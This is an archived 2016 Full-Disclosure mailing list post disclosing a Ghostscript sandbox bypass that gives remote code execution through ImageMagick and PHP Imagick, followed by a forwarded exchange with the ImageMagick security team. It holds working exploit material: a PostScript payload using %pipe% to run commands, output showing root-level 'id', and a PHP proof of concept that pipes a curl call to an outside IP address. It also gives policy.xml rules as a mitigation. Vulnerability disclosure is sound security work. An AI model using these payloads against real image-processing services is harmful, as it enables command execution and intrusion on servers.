| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAPGxrc8oRSG3HiYshgZF0OauOwjZsrcB7KnFdOUvTMQ=uP3kcg@mail.gmail.com>
Date: Wed, 19 Oct 2016 15:37:32 +0800
From: redrain root <rootredrain@...il.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] Ghostscript sadbox bypass lead ImageMagick to remote code
execution
recently I noticed Tavis Ormandy reporting a vulnerability about Ghostscript
-dSAFER mode could be ignored and lead to code execution, however no one
exploit it in a application. there is a simple discussion and exploit
about it.
Author: redrain, yu.hong@...itin.com
Date: 2016-10-17
Version: Ghostscript version > 1.6
ImageMagick(or other app) all version
Vendor Notified: 2016-10-18
ImageMagick allows to process files with external libraries (delegate). And
there are some delegate:
<delegate decode="eps" encode="pdf" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
"-sDEVICE=pdfwrite" "-sOutputFile=%o"
"-f%i""/>
<delegate decode="eps" encode="ps" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ps2write"
"-sOutputFile=%o" "-f%i""/>
<delegate decode="ps" encode="eps" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite"
"-sOutputFile=%o" "-f%i""/>
<delegate decode="ps" encode="pdf" mode="bi" command=""gs" -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pdfwrite"
"-sOutputFile=%o" "-f%i""/>
all of these delegate have use the Ghostscript(gs) to handle "pdf to eps"
"ps to eps" "eps to ps" "pdf to ps", and all delegates have use a parameter
-f, this parameter can lead ghostscript to exec any command.
Ghostscript version: > 9.16
for example, the lastest ubuntu 16.10 ghostscript package version is 9.19,
any user use imagemagick in this system is vulnerable.
cat rr.pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty)
.putdeviceparams
quit
convert rr.pdf eps:rr
root@...rain-Parallels-Virtual-Platform:/tmp# convert rr.pdf eps:rr
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
uid=0(root) gid=0(root) 组=0(root)
+ ./base/gsicc_manage.c:1680: gsicc_set_device_profile(): Creation of ICC
profile failed
convert: no images defined `eps:rr' @
error/convert.c/ConvertImageCommand/3253.
And there is a interesting thing, Imagemagick will auto recognize the file
real format with the file header. and use correspond delegate to handle.
It also affects imagick.
PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)
.putdeviceparams
quit
EOF;
$thumb = new Imagick();
$thumb->readImageBlob($exploit);
Regards,
redrain
---------- Forwarded message ----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-19 1:47 GMT+08:00
Subject: Fwd: Security Issue
To: chris.liddell@...ifex.com
Hi chris,
there is a vulnerability about Ghostscript, imagemagick security team
suggest me to post to your group
Regards,
redrain
Forwarded conversation
Subject: Re: Security Issue
------------------------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 19:16 GMT+08:00
To: rootredrain@...il.com
We've seen this Ghostscript issue before and it was rerouted to the
Ghostscript
maintainers. And it looks like the flaw in Ghostscript might be fixed.
We're using Ghostcript 9.20 and we get:
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ'
./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
'gs' -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4
-dGraphicsAlphaBits=4 '-r72x72' -g612x792
'-sOutputFile=/tmp/magick-648756ZKNqV4YYgXz%d'
'-f/tmp/magick-64875THTBoMVujWnI' '-f/tmp/magick-64875_eM-vPaztTOQ' -c
showpage
./base/gsicc_manage.c:1148: gsicc_open_search(): Could not find %pipe%id
> /dev/tty
| ./base/gsicc_manage.c:1789: gsicc_set_device_profile(): cannot find
device profile
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo
mmand/3253.
Until Ghostscript is upgraded under Ubuntu with the Ghostscript security
patch,
you can add a security policy to ImageMagick's policy.xml to prevent
Postscript / PDF from being rendered:
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
Now we get
convert -verbose rr.pdf eps:rr
convert: not authorized `rr.pdf' @ error/constitute.c/ReadImage/416.
convert: no images defined `eps:rr' @ error/convert.c/ConvertImageCo
mmand/3253.
The ImageMagick Security Team
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 19:41 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
[image: 内嵌图片 1]
root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q
-dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
-sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf
uid=0(root) gid=0(root) groups=0(root)
+ ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
profile failed
root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
--version
9.20
root@...ntu:/opt/ghostscript-9.20-linux-x86_64#
Regards,
redrain
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 19:45 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
I guess u used the old gs version.?
and this vulnerability affected version >9.16
Regards,
redrain
2016-10-18 19:16 GMT+08:00 <vir.prudens.non.contra.ventum
.mingit@...gemagick.org>:
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 19:50 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> I guess u used the old gs version.?
> and this vulnerability affected version >9.16
We're using Ghostscript 9.20 which is > 9.16.
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 20:11 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
u can use
tar zxf a.tar.gz
cd sb
./a.sh
then the command returns "uid=0(root) gid=0(root) groups=0(root)"
Regards,
redrain
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 21:08 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> [image: ???????????? 1]
>
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64 -q
> -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
> -sDEVICE=pdfwrite -sOutputFile=1.eps -f /var/www/html/1.pdf
> uid=0(root) gid=0(root) groups=0(root)
> + ./base/gsicc_manage.c:1713: gsicc_set_device_profile(): Creation of ICC
> profile failed
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64# ./gs-920-linux_x86_64
> --version
> 9.20
> root@...ntu:/opt/ghostscript-9.20-linux-x86_64#
>
Its likely the patch was against Ghostscript in Fedora 25. As mentioned,
in the mean time add a security policy to ImageMagick to prevent the use
of Ghostscript.
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 21:19 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org
the lastest ghostscript is downloaded in http://www.ghostscript.com/
download/gsdnld.html and i'm trying to reproduce this vuln in different
distros, it works.
so do u consider this is a valid
<http://www.baidu.com/link?url=vaDUociPg8LBZyXflgyuNcr3M9njzrr-uFePUKarXS82DjxvGsJ_TeeeXLEBaOpoGIq1Vs7ZZALVaZ6Xu4YxM5H6-FgBiXtjhccxpZs6iXe>
vulnerability?
and another interesting thing is i try to exploit it in imagick, looks work
well
PoC:
<?php
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl
108.61.160.217:12344)
.putdeviceparams
quit
EOF;
$thumb = new Imagick();
$thumb->readImageBlob($exploit);
Regards,
redrain
----------
From: redrain root <rootredrain@...il.com>
Date: 2016-10-18 21:38 GMT+08:00
To: 332746458@...com
Regards,
redrain
----------
From: <vir.prudens.non.contra.ventum.mingit@...gemagick.org>
Date: 2016-10-18 22:21 GMT+08:00
To: vir.prudens.non.contra.ventum.mingit@...gemagick.org,
rootredrain@...il.com
redrain root <rootredrain@...il.com> wrote:
> the lastest ghostscript is downloaded in
> http://www.ghostscript.com/download/gsdnld.html and i'm trying to
reproduce
This appears to be a Ghostscript vulnerability. Post to the Ghostscript
developers group. We can't fix a Ghostscript vulnerability and our only
suggestion is an ImageMagick security policy that prevents the use of
Ghostscript until the vulnerability is fixed in Ghostscript.
Download attachment "image.png" of type "image/png" (157247 bytes)
Content of type "application/x-gzip" skipped
Content truncated
Powered by blists - more mailing lists